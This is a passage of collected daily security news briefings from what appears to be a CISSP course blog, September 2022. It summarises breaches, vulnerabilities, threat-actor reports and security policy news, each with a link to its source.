Flashpoint Team, What We Know About the 'Grand Theft Auto VI' Data Breach, blog article, 23 September 2022. Available online at https://flashpoint.io/blog/grand-theft-auto-6-data-breach/.

Optus Data Breach Resonates

The massive data breach of Australian telco continues to resonate, with ongoing implications for the telco, its customers and regulators. The hacker behind the breach has apparenty now demanded a $US 1 million ransom - which, considering the number of records, amounts to just over 10c per record. Local journalist Jeremy Kirk has been in touch with the alleged hacker and confirmed the authenticity of a sample of the data with the affected customers.

The hacker claims that they obtained access via an API endpoint which required no authentication - a classic function-level authorization vulnerability - enumerating a field called 'contactid' to access customer records sequentially.

Because the customer data contains so much information that can be used for identity theft, the Government is considering changes to privacy laws which will speed the disclosure of such information to banks so that the financial institutions can apply additional monitoring and controls on the accounts of the affected customers. Considering that it is the existing privacy laws that prevent this type of disclosure, the government might wish to pause for reflection on the Law of Unintended Consequences before pushing through any half-baked ideas.

Belot, Henry, Australian Federal Police monitoring dark web amid allegations stolen Optus data may be sold online, ABC News, 24 September 2022. Available online at https://www.abc.net.au/news/2022-09-24/afp-monitoring-dark-web-for-stolen-optus-data-sold-online/101471256.

Kirk, Jeremy, UPDATE: I reached the person who claims to have hacked Optus, tweet, 24 September 2022. Available online at https://twitter.com/jeremy_kirk/status/1573652986437726208.

Speers, David and Andrew Greene, Federal government to unveil new security measures following massive Optus data breach, ABC News, 25 September 2022. Available online at https://www.abc.net.au/news/2022-09-25/new-security-measures-to-be-unveiled-following-optus-data-breach/101472364.

XSS, CSRF Vulns in Netlify JavaScript Library

Web sites built with the Netlify development platform are vulnerable to cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks, due to a cache poisoning vulnerability (CVE-2022-39239), say researchers. The vulnerability allows attackers to use specially crafted headers which cause the cache handler to load and return arbitrary images - which could include scalable vector graphics (SVG) files carrying embedded malicious scripts.

The vulnerability is due to improper URL parsing in the unjs/ufo library which is, in turn, used by the @netlify/ipx library. This is installed by default on many Netlify installations.

Netlify versions prior to 1.2.3 are vulnerable, and customers are - obviously - urged to update and redeploy sites to clear caches.

Curry, Sam, Exploiting Web3's Hidden Attack Surface: Universal XSS on Netlify's Next.js Library, blog post, 21 September 2022. Available online at https://samcurry.net/universal-xss-on-netlifys-next-js-library/.

Course Updates

Course materials updated in the last few days:

Updated Lecture Slides

• Security in the Software Development Life Cycle Slides

Updated CISSP CBK wiki pages:

• CBK Wiki/RESTful API
• CBK Wiki/Simple Object Access ProtocolCBK Wiki/XML-RPC
• CBK Wiki/Broken Object-Level Authorization
• CBK Wiki/JSON Web Token
• CBK Wiki/Federated Identity Management Systems
• CBK Wiki/Software Development for Mobile Devices
• CBK Wiki/Excessive Data Exposure
• CBK Wiki/Sensitive Data Exposure
• CBK Wiki/Broken Function-Level Authorization
• CBK Wiki/Injection Attacks
• CBK Wiki/Lack of Resources and Rate Limiting
• CBK Wiki/Mass Assignment
• CBK Wiki/Improper Web API Asset Management
• CBK Wiki/Insufficient Logging and Monitoring
• CBK Wiki/API Security
• CBK Wiki/API key
• CBK Wiki/Broken User Authentication
• CBK Wiki/Web Application Security
• CBK Wiki/Cross-Site Request Forgery
• CBK Wiki/Polymorphism
• CBK Wiki/Inheritance
• CBK Wiki/Encapsulation
• CBK Wiki/Object-Oriented Concepts and Security

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Exchange Servers Compromised For Spamming

Microsoft is warning of an attack which compromises cloud-hosted Exchange servers by installing a malicious OAuth application which then enables the attacker to send spam emails which appear to be from the victim's domain.

Initial access is achieved by a credential stuffing attack, based on a dump of existing credentials, in order to gain access to an admin account which did not have multi-factor authentication enabled (which would have prevented the attack). Once this was achieved, the attacker probably ran a PowerShell script to register a new application, grant it the Exchange.ManageAsApp permission with admin consent, give it global admin and Exchange admin roles and then add some credentials which will allow them to maintain control.

This app was then used to create a new inbound connector and transport rules in Exchange. This allowed the threat actor to then conduct a high-volume spam campaign, intended to trick recipients into providing credit card details and signing up for a recurring subscription service - a fairly obvious scam, but one that still works well enough.

Microsoft 365 Defender Research Team, Malicious OAuth application used to compromise email servers and spread spam, blog article, 22 September 2022. Available online at https://www.microsoft.com/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/.

NSA, CISA Advise on OT & ICS Defence

The National Security Agency and Cybersecurity & Infrastructure Security Agency have issued a joint alert providing guidance on security for Operational Technology (OT) and Industrial Control Systems (ICS). These systems monitor and control industrial processes - power stations, refineries, steel mills, but also air conditioning plant for office buildings, ovens for small bakeries and water treatment plants - which collectively are essential to . . . everything. Disrupting their operation can lead to outcomes from mild annoyance through political and economic gains to physical destruction and loss of life.

The alert provides guidance on the TTP's and overall game plan of threat actors targeting OT/ICS, as well as a suggested approach to the development of mitigation strategies.

NSA/CISA, Control System Defense: Know the Opponent, Alert AA22-265A, 22 September 2022. Available online at https://www.cisa.gov/uscert/ncas/alerts/aa22-265a.

Zoho ManageEngine Exploit in the Wild

A remote command execution vulnerability (CVE-2022-35405) in Zoho ManageEngine Access Manager Plus (version 4302 and earlier), Password Manager Pro (version 12100 and earlier) and PAM360 (version 5500 and earlier) is being actively exploited in the wild and has been added to CISA's Known Exploited Vulnerabilities Catalog.

The insecure object deserialization vulnerability, in a Java XMLRPC parser, is of critical severity, and customers are advised to updated their installations as soon as possible.

Uncredited, ManageEngine PAM360, Password Manager Pro, and Access Manager Plus remote code execution vulnerability, security advisory, September 2022. Available online at https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html.

Metador Mystery Threat Actor

Researchers at SentinelLabs have discovered a previously-unseen threat actor which is primarily targeting telcos, ISP's and universities in the Middle East and Africa. The group, which they christened 'Metador', has deployed sophisticated malware which makes use of antiforensics techniques to evade detection and LOLbins to deploy malware directly into memory.

The origin of the malware is unclear - linguistic analysis points to multiple developers speaking both English and Spanish, with references to British pop punk lyrics and Argentinian political cartoons - but since the cyberespionage is focused on the Middle East and Africa, it is possible the development of the malware was contracted out by a state agency.

Guerrero-Saade, Juan Andrés et. al., The Mystery of Metador | An Unattributed Threat Hiding in Telcos, ISPs, and Universities, technical report, 22 September 2022. Available online at https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

German General Data Retention Rule Violates EU Law

Attempts by European governments to proactively collect data in case it turns out to be useful in counter-terrorism investigations have taken a serious hit, with the European Union's Court of Justice ruling that such blanket collection of data can only be done in circumstances where there is a serious threat to national security.

The ruling illustrates the tension between governments' desire to make use of massive data collection and analytics in the name of national security and public safety, and citizens increasing concerns over personal privacy, especially in light of several countries' swing towards authoritarianism.

The ruling is the result of a case brought by Deutsche Telekom and ISP SpaceNet AG, challenging the German data retention law. Of course, the tech companies are less motivated by concerns for their customers' privacy and more by the burdensome costs of collecting and storing all that data.

Chee, Foo Yun, Germany's blanket data retention law is illegal, EU top court says, Reuters, 20 September 2022. Available online at https://www.reuters.com/technology/indiscriminate-data-retention-is-illegal-eu-top-court-says-2022-09-20/.

Enhancements in Windows 11 22H2 Security Baseline

Microsoft has released their security configuration baseline settings for Windows 11 22H2, adding a number of security improvements. Top of these has to be additional hardware-based protection against stack-smashing and return-oriented/jump-oriented programming attacks for machiines that use Intel's Control-flow Enforcement Technology or similar shadow stacks. The new feature, called Kernel Mode Hardware-enforced Stack Protection, also requires Virtualization Based Protection of Code Integrity (HVCI) to be enabled.

Other enhancements include enhanced phishing protection, including detection of the reuse of enterprise passwords on other applications or web sites and credential theft protection by blocking the loading of custom security support and authentication providers into the Local Security Authority Subsystem Service (LSASS) - a technique used by some credential stealers. The update also allows Administrator accounts to be locked in the event of brute-force attacks.

The new baseline can be downloaded using the Microsoft Security Compliance Toolkit found at https://www.microsoft.com/en-us/download/details.aspx?id=55319.

Munck, Rick, Windows 11, version 22H2 Security baseline, Microsoft Security Baselines Blog, 20 September 2022. Available online at https://techcommunity.microsoft.com/t5/microsoft-security-baselines/windows-11-version-22h2-security-baseline/ba-p/3632520.

EU Proposes Stricter Regulation of Software and IoT Devices

Back to the EU, which has laid out its proposals for a new regulation, called the Cyber Resilience Act, which will regulate security of both digital hardware and software products. The legislators claim that an estimated annual cost of €5.5 trillion is down to two major problems with these products:

• A low level of cybersecurity, stemming from widespread vulnerabilities and no way to patch them, and
• Insufficient understanding and access to security information by users, leading them to choose insecure products and use them in an insecure fashion.

The Act will broaden the scope of existing legislation to cover non-embedded software and some hardware products which are not currently in scope, and aims to encourage the development of secure prodycts and a market in which purchasers are adequately informed to take cybersecurity into account when selecting and using products.

Uncredited, Cyber Resilience Act, Policy and Legislation proposal, 15 September 2022. Available online at https://digital-strategy.ec.europa.eu/en/library/cyber-resilience-act.

Australia Plans Restrictions on Online Content

Still on the subject of proposed legislation, Australian enterprises may find themselves unexpectedly affected by changes in the industry codes relating to the Online Safety Act. The changes are intended to regulate what is described - and determined - by the eSafety Commissioner as "harmful online content". This is broken up into "Class 1" material, which is essentially material that would be refused classification under the National Classification Scheme, and "Class 2", which would be X18+ or R18+ materials. Class 1 is further subdivided, according to the nature of the offensive material.

Industry groups point to several problems with this approach. First, the classification scheme is - perhaps by necessity - somewhat vague, and can encompass some materials which are legal to create, distribute and possess. Secondly, while classification is definitely done for movies released to theatres, it is not practical to do this for every piece of material floating around the Internet.

Furthermore, the use of automated approaches to the detection of harmful content could seriously impact privacy, while manual review could prove even worse.

Bogle, Ariel, Australia's changing how it regulates the internet - and no-one's paying attention, ABC News, 21 September 2022. Available online at https://www.abc.net.au/news/science/2022-09-21/internet-online-safety-act-industry-codes/101456902.

Domain Shadowing Borrows Reputation for C2 Servers

Palo Alto Networks' Unit 42 researchers have documented a new tactic employed by cybercriminals in order to maintain their C2 domains by borrowing the reputation of legitimate enterprises. The tactic works by compromising the domain name servers of a legitimate business and then creating malicious subdomains. Because the legitimate domain names have existed for some years, they have established a good reputation in threat intelligence databases, and because this tactic does not affect the enterprise's other systems, it is likely to pass completely unnoticed.

Unit 42 built an automated pipeline which uses machine learning to analyze passive DNS traffic logs, detecting over 12,000 such shadowed domains between late April and late June of this year. Of these, only 200 were marked as malicious by vendors in VirusTotal. In one example, the operators of a phishing campaign had shadowed domains in the AU and US TLD's, and their shadowed domains had IP addresses located in Russia.

Szurdi, Janos, Rebekah Houser abd Daping Liu, Domain Shadowing: A Stealthy Use of DNS Compromise for Cybercrime, technical report, 21 September 2022. Available online at https://unit42.paloaltonetworks.com/domain-shadowing/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.